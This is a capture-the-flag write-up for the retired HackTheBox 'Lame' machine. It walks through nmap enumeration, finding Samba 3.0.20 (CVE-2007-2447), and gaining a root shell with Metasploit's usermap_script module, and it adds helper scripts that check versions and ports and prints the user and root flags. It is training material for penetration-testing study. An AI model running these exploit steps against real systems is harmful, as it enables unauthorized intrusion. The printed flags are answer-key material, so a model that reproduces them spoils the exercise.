
Lame

HackTheBox Easy Linux Retired

TL;DR

# 1. Enumerate
nmap -sV -sC -oN nmap/initial <attack_ip>

# 2. Check Samba version — 3.0.20 is vulnerable
searchsploit samba 3.0.20

# 3. Fire the exploit in Metasploit
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS <attack_ip>
set LHOST YOUR_IP
run

# 4. Already root — no privesc needed
whoami   # root

Given Info

Box description: Lame is an Easy Linux box and one of the first machines on HTB. It runs an outdated Samba version with a critical unauthenticated RCE vulnerability. No privilege escalation required — the exploit lands you directly as root.

Recommended modules:

  • Network Enumeration with Nmap
  • Vulnerability Assessment
  • Metasploit Framework basics

Where I Got Stuck

  • Blank shell panic — after the exploit fired the shell looked completely empty. Thought it had failed. It was actually live — just needed to type a command to confirm. Don’t assume a blank prompt means failure, try whoami first.
  • Port already in use — first exploit run failed with Rex::BindFailed because port 4444 was still in use from a prior attempt. Kill existing handlers or change LPORT before re-running.
  • FTP typo — typed “Annonymous” on first FTP login attempt. Got a 530. Worth noting: anonymous FTP login uses lowercase “anonymous” as both username and password (or blank password).

Enumeration

Nmap

nmap -sV -oN nmap/initial <attack_ip>

Results:

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X

nmap -sC -oN nmap/scripts <attack_ip>

Key findings from script scan:

  • Anonymous FTP login allowed — confirmed by -sC
  • Samba exact version identified as 3.0.20-Debian — this is critical
  • SMB message signing disabled
  • SMB2 negotiation failed — indicative of very old Samba

Exact Samba version is what makes this box. 3.X - 4.X from -sV alone isn’t enough — the -sC script scan pins it to 3.0.20-Debian which is the vulnerable version.

Port 21 — FTP (vsftpd 2.3.4)

ftp <attack_ip>
# Username: anonymous
# Password: (blank)

Connected successfully. Directory was completely empty — no files, no useful access.

Dead end. Moved on.

vsftpd 2.3.4 has its own known backdoor (CVE-2011-2523) worth checking on future boxes even if FTP looks empty. On Lame it’s a red herring.

Port 445 — Samba 3.0.20

searchsploit samba 3.0.20

Results:

Samba 3.0.20 < 3.0.25rc3 - Username Map Script RCE   unix/remote/16320.rb

.rb extension = Metasploit module. Knowing this saves time — you can load it directly in msfconsole without hunting for the path.

CVE-2007-2447 confirmed. The vulnerability allows an unauthenticated attacker to inject shell commands via a crafted username during SMB authentication.
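The two points above (a -sV range like "3.X - 4.X" is not enough to search on, and searchsploit's "3.0.20 < 3.0.25rc3" is a half-open version range) are easy to get wrong by eye. The script below is an added example, not part of the original writeup: it parses a constructed copy of the -sV table, uses a constructed smb-os-discovery-style line from -sC to pin the Samba build, and checks each service against the two version ranges the page names (CVE-2007-2447 for Samba, CVE-2011-2523 for vsftpd). The version comparison treats "rc" builds as sorting before the final release and ignores distro suffixes such as "-Debian"; the sample text, the `KNOWN_ISSUES` table and all function names are assumptions for this example.

```python
import re

# Constructed sample input: the -sV table from the writeup, and one line shaped
# like the smb-os-discovery script output that -sC adds (not real scan data).
SAMPLE_SV_OUTPUT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X
"""
SAMPLE_SC_OUTPUT = "|   OS: Unix (Samba 3.0.20-Debian)\n"

# Vulnerable ranges as stated on the page: lower bound inclusive, upper exclusive.
KNOWN_ISSUES = [
    ("Samba", "3.0.20", "3.0.25rc3", "CVE-2007-2447"),  # username map script RCE
    ("vsftpd", "2.3.4", "2.3.5", "CVE-2011-2523"),       # backdoored 2.3.4 release
]

# port/proto  state  service  product [smbd] version...
SERVICE_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+\S+\s+\S+\s+(\S+)(?:\s+smbd)?\s*(.*)$")
# "Samba 3.0.20-Debian" inside script output pins what -sV left fuzzy
SCRIPT_VERSION_RE = re.compile(r"\b(Samba|vsftpd|OpenSSH)\s+(\d[\w.\-]*)")


def parse_version(text: str) -> tuple:
    """Turn '3.0.25rc3' / '3.0.20-Debian' / '4.7p1' into a comparable tuple.

    Release candidates sort before the final release of the same number:
    3.0.25rc3 -> (3, 0, 25, 0, 3) and 3.0.25 -> (3, 0, 25, 1, 0).
    Anything after '-' or whitespace (e.g. '-Debian') is ignored.
    """
    core = re.split(r"[-\s]", text, maxsplit=1)[0]
    m = re.match(r"^(\d+(?:\.\d+)*)(?:rc(\d+))?", core)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    nums = [int(n) for n in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))  # pad '3.0' to three components
    if m.group(2):
        return (*nums, 0, int(m.group(2)))
    return (*nums, 1, 0)


def is_fuzzy(version: str) -> bool:
    """-sV often reports a range such as '3.X - 4.X' instead of an exact build."""
    return "X" in version or " - " in version


def assess(sv_output: str, sc_output: str = "") -> list:
    """Return (port, product, version, status) per service line.

    status is a CVE id from KNOWN_ISSUES, 'ok', or 'unpinned: run -sC' when
    -sV gave a range and no script output pinned the exact version.
    """
    pinned = dict(SCRIPT_VERSION_RE.findall(sc_output))
    findings = []
    for line in sv_output.splitlines():
        m = SERVICE_RE.match(line)
        if not m:
            continue  # header or unrelated output
        port, product, version = int(m.group(1)), m.group(2), m.group(3).strip()
        if is_fuzzy(version):
            if product not in pinned:
                findings.append((port, product, version, "unpinned: run -sC"))
                continue
            version = pinned[product]
        status = "ok"
        for prod, low, high, cve in KNOWN_ISSUES:
            if prod == product and parse_version(low) <= parse_version(version) < parse_version(high):
                status = cve
        findings.append((port, product, version, status))
    return findings


if __name__ == "__main__":
    for finding in assess(SAMPLE_SV_OUTPUT, SAMPLE_SC_OUTPUT):
        print(*finding)
```

Run it once with only the -sV text and the two Samba lines come back as "unpinned: run -sC"; feed it the script-scan line as well and both are matched to CVE-2007-2447, which is exactly the difference between the two nmap runs in the writeup.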


Attack Plan

Option A: Manual exploit ✗ (skipped)

A manual Python exploit exists but Metasploit handles this cleanly and this is a straightforward known CVE. Manual approach covered in the Shocker writeup — used it there for the learning value.


Option B: Metasploit — usermap_script ✓

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS <attack_ip>
set LHOST YOUR_IP
run

First attempt — failed:

Rex::BindFailed — Address already in use

Port 4444 was still bound from a previous session. Fix:

set LPORT 4445
run
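Rex::BindFailed is the generic "address already in use" error surfacing through Metasploit, and it is cheaper to check for a free local port before launching any handler than to diagnose it afterwards. The snippet below is an added example, not from the writeup or from Metasploit: `port_is_free` attempts a real bind and `first_free_port` walks upward from 4444 the way the author did by hand when switching to 4445. `demo_conflict` holds a listener open on 127.0.0.1 so the checker can be seen reporting the conflict; the function names and the loopback address are assumptions for this example.

```python
import socket
from typing import Optional


def port_is_free(port: int, host: str = "127.0.0.1") -> bool:
    """True if a TCP socket can bind host:port right now.

    A failed bind raises OSError (EADDRINUSE on Linux), which is the same
    condition Metasploit reports as Rex::BindFailed.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind((host, port))
        except OSError:
            return False
    return True


def first_free_port(start: int = 4444, count: int = 20, host: str = "127.0.0.1") -> Optional[int]:
    """Return the first bindable port in [start, start + count), or None."""
    for port in range(start, start + count):
        if port_is_free(port, host):
            return port
    return None


def demo_conflict(start: int = 4444) -> tuple:
    """Reproduce the writeup's situation: a stale listener still owns the port.

    Returns (busy_port, port_is_free(busy_port), next_free_port) while a
    listener is held open on busy_port.
    """
    busy = first_free_port(start)
    if busy is None:
        raise RuntimeError("no free port in range to demonstrate with")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as holder:
        holder.bind(("127.0.0.1", busy))
        holder.listen(1)  # now behaves like the leftover handler from a prior run
        return busy, port_is_free(busy), first_free_port(start)


if __name__ == "__main__":
    busy, free_now, alternative = demo_conflict()
    print(f"port {busy} free while held: {free_now}; use LPORT {alternative} instead")
```

The same check is what a `set LPORT` decision should be based on; the usual fix on the Metasploit side is to list and kill stale jobs before starting a new handler, which this script does not do.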

Second attempt — success:

Command shell session 1 opened

Shell appeared blank. Typed whoami:

root

Direct root shell. No privilege escalation required.


Post Exploitation / Privilege Escalation

None required. The Samba exploit spawns a shell directly as root — uncommon and worth noting when it happens.

whoami
# root

cat /root/root.txt
cat /home/makis/user.txt

Flags

🚩 User Flag: 9677bcdd2b51f3355e7c68fb5fedef22
🚩 Root Flag: b78c9afc390a1f867e05b975460e4908

What I Learned

  • Blank shell ≠ dead shell — always type a command before assuming the exploit failed. A blank prompt after a shell opens is normal behaviour for some exploits.
  • -sC matters: -sV gave 3.X - 4.X which is useless for exploit searching. -sC pinned the exact version. Always run both.
  • .rb in searchsploit = Metasploit module — saves time knowing which tool to reach for immediately.
  • Port conflicts — kill prior handlers or change LPORT before re-running any exploit. Rex::BindFailed is almost always a port conflict.
  • vsftpd 2.3.4 backdoor — this version has CVE-2011-2523, a known backdoor. On Lame it’s a dead end but worth remembering for future boxes.
  • Direct root is rare — most boxes require privesc. When you land as root immediately, double-check with whoami and id before assuming something went wrong.